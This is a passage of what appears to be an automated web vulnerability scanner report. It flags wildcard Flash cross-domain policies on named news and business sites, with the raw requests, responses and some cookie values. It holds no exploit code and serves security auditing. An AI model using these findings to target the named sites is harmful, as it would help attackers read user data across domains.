X-PvInfo: [S10232.C165520.A165311.RA0.G2868D.U50F79C0A].[OT/xml.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gartner.com" />
<allow-access-from domain="imagesrv" />
...[SNIP]...
6.16. https://my.gartner.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://my.gartner.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: my.gartner.com

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Thu, 21 Feb 2008 21:57:01 GMT
Content-Type: text/xml
Date: Thu, 12 May 2011 20:25:36 GMT
Content-Length: 215
ETag: "pv233a7a37fdbb365dbf1ce37f9ccae49d"
X-PvInfo: [S10232.C10825.A23119.RA0.G5BB6.U40572F46].[OT/xml.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TSf9d1c9=975603175f7b6a2669ce3a3f41fabb68bff1a145265abd7d4dcc4240; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gartner.com" />
</cross
...[SNIP]...
6.17. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=113
Expires: Thu, 12 May 2011 17:17:40 GMT
Date: Thu, 12 May 2011 17:15:47 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...
6.18. http://timespeople.nytimes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://timespeople.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: timespeople.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 19:54:02 GMT
Content-length: 464
Content-type: text/xml
Last-modified: Wed, 10 Mar 2010 02:18:30 GMT
Accept-ranges: bytes
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.*.tremormedia.com" />
   <allow-access-from domain="*.tremormedia.com" />
   <allow-access-from domain="*.brightcove.com" />
...[SNIP]...
6.19. http://w.sharethis.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 06 May 2011 17:23:38 GMT
ETag: "30106-14a-4a29ec0155a80"
Content-Type: application/xml
Date: Thu, 12 May 2011 18:35:35 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...
6.20. http://www.cnbc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:55:00 GMT
Via: 1.1 C aicache6
Content-Length: 3794
X-Aicache-OS: 65.55.53.237:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Thu, 12 May 2011 16:56:00 GMT

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
...[SNIP]...
<allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
...[SNIP]...
6.21. http://www.forbes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.forbes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.forbes.com

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 16:55:03 GMT
Server: Apache/1.3.26
Vary: Accept-Encoding,User-Agent
Last-Modified: Tue, 22 Dec 2009 15:13:03 GMT
ETag: "11033e1-4fb-4b30e1ff"
Accept-Ranges: bytes
Content-Length: 1275
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" />
<allow-access-from domain="static.scanscout.com" />
...[SNIP]...
<allow-access-from domain="images.forbes.com" />
<allow-access-from domain="rss.forbes.com" />
<allow-access-from domain="video.forbes.com" />
<allow-access-from domain="*.postapp.com" />
<allow-access-from domain="*.widgetbox.com" />
<allow-access-from domain="*.widgetserver.com" />
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="rmd.atdmt.com" secure="false" />
...[SNIP]...
6.22. http://www.ft.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ft.com

Response

HTTP/1.1 200 OK
ETag: "51d-4ba8ec18"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Accept-Ranges: bytes
Content-Length: 1309
Date: Thu, 12 May 2011 16:55:30 GMT
Connection: close
Last-Modified: Tue, 23 Mar 2010 16:28:08 GMT
Server: Apache/1.3.37
Content-Type: text/xml
Keep-Alive: timeout=1, max=120

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ft.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.tangozebra.com" secure="true"/>
<allow-access-from domain="*.euronews.net" secure="true"/>
<allow-access-from domain="*.google.com" secure="true"/>
<allow-access-from domain="*.gstatic.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="false"/>
<allow-access-from domain="*.dartmotif.net" secure="false"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.googlesyndication.com" secure="true"/>
<allow-access-from domain="*.brightcove.com" secure="true"/>
<allow-access-from domain="*.google-analytics.com" secure="true"/>
...[SNIP]...
6.23. http://www.gartner.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Mon, 28 Jan 2008 18:59:12 GMT
Content-Type: text/xml
Date: Thu, 12 May 2011 20:18:53 GMT
Content-Length: 214
ETag: "pv778ca12c3b1716ca2e91fcc20b110b13"
X-PvInfo: [S10232.C10821.A158658.RA0.G26D16.UDDE6142E].[OT/xml.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=ae91f2c6d4cc07e539c79d969716e4411624ced436e3e4484dcc40ad; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gartner.com" />
</cross-
...[SNIP]...
6.24. https://www.gartner.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.gartner.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Mon, 28 Jan 2008 18:59:12 GMT
Content-Type: text/xml
Date: Thu, 12 May 2011 20:19:46 GMT
Content-Length: 214
ETag: "pv778ca12c3b1716ca2e91fcc20b110b13"
X-PvInfo: [S10232.C10821.A158658.RA0.G26D16.UDDE6142E].[OT/xml.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=b8233c9c6cc3e4d054b09d6cc84eb117ed96ca530cf9e97a4dcc40e2; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gartner.com" />
</cross-
...[SNIP]...
6.25. http://www.law.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.law.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.law.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 26 Jul 2010 20:36:49 GMT
ETag: "1534076-100-48c5058077a40"
Content-Type: text/xml
New_Hostname: /crossdomain.xml@
New_Hostname: /crossdomain.xml@
New_Hostname: /crossdomain.xml@
Date: Thu, 12 May 2011 16:55:24 GMT
Content-Length: 256
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="http://www.law.com"/>
   <allow-access-from domain="*.law.com"/>
...[SNIP]...
6.26. http://www.marketwatch.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marketwatch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 04 Nov 2010 12:22:38 GMT
Accept-Ranges: bytes
ETag: "07be2f71a7ccb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp03
Date: Thu, 12 May 2011 16:55:27 GMT
Connection: keep-alive
Content-Length: 1625

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.marketwatch.com" />
<allow-access-from domain="*.mktw.net" />
<allow-access-from domain="creatives.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net"/>
<allow-access-from domain="m.doubleclick.net"/>
<allow-access-from domain="m2.doubleclick.net"/>
<allow-access-from domain="m3.doubleclick.net"/>
<allow-access-from domain="m.2mdn.net"/>
<allow-access-from domain="m2.2mdn.net"/>
<allow-access-from domain="betadfa.doubleclick.net"/>
<allow-access-from domain="dfa.doubleclick.net"/>
<allow-access-from domain="motifcdn2.doubleclick.net"/>
<allow-access-from domain="ad.doubleclick.net"/>
<allow-access-from domain="m1.2mdn.net"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.wsj.com"/>
<allow-access-from domain="*.allthingsd.com"/>
<allow-access-from domain="*.barrons.com"/>
<allow-access-from domain="*.wsj.net"/>
<allow-access-from domain="*.dowjones.net"/>
<allow-access-from domain="*.llnwd.net"/>
<allow-access-from domain="*.wsj.com"/>
<allow-access-from domain="*.wsjradio.com"/>
<allow-access-from domain="*.barrons.com"/>
<allow-access-from domain="aes.online.edit.dowjones.net"/>
<allow-access-from domain="api.bizographics.com"/>
...[SNIP]...
6.27. http://www.npr.org/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.npr.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.npr.org

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:53 GMT
Server: Apache/2.2.14 (Unix)
Last-Modified: Thu, 07 Apr 2011 20:17:23 GMT
Accept-Ranges: bytes
Content-Length: 455
Cache-Control: max-age=600
Expires: Thu, 12 May 2011 17:05:53 GMT
Keep-Alive: timeout=10, max=4977
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.threespot.com"/>
   <allow-access-from domain="*.npr.org" />
   <allow-access-from domain="*.digitaria.com"/>
   <allow-access-from domain="www.kqed.org" />
   <allow-access-from domain="*.iheartnpr.org" />
   <allow-access-from domain="apps.facebook.com" />
...[SNIP]...
6.28. http://www.nytimes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 16:55:57 GMT
Content-length: 1169
Content-type: text/xml
Set-cookie: RMID=12079f57143b4dcc111dda5d; expires=Friday, 11-May-2012 16:55:57 GMT; path=/; domain=.nytimes.com
Last-modified: Wed, 21 Jul 2010 15:01:34 GMT
Accept-ranges: bytes
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
   <allow-access-from domain="*.predictify.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.*.brightcove.com" />
   <allow-access-from domain="*.nytsyndicate.com"/>
   <allow-access-from domain="*.*.nytsyndicate.com"/>
   <allow-access-from domain="xdce.adobe.com" />
   <allow-access-from domain="www.rokkandev.com" />
   <allow-access-from domain="cdn.eyewonder.com" />
   <allow-access-from domain="apps.eyewonderlabs.com" />
   <allow-access-from domain="media.pointroll.com" />
   <allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="u-sta.unicast.com"/>
<allow-access-from domain="creativeby1.unicast.com"/>
<allow-access-from domain="creativeby2.unicast.com"/>
<allow-access-from domain="picklegroup.com"/>
...[SNIP]...
6.29. http://www.stumbleupon.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 18 Oct 2010 23:13:29 GMT
Content-Type: application/xml
Content-Length: 460
Date: Thu, 12 May 2011 20:19:33 GMT
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
   <allow-access-from domain="cdn.stumble-upon.com" />
...[SNIP]...
6.30. http://www.usatoday.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:46 GMT
Accept-Ranges: bytes
ETag: "4cb2c81217e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Thu, 12 May 2011 16:59:25 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...
6.31. http://www.washingtonpost.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.washingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 06 Feb 2011 23:42:57 GMT
Content-Type: application/xml
Content-Length: 478
X-Cnection: close
Cache-Control: must-revalidate, max-age=46
Date: Thu, 12 May 2011 16:59:53 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.washingtonpost.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="*.newsweek.com"/>
<allow-access-from domain="*.digitalink.com"/>
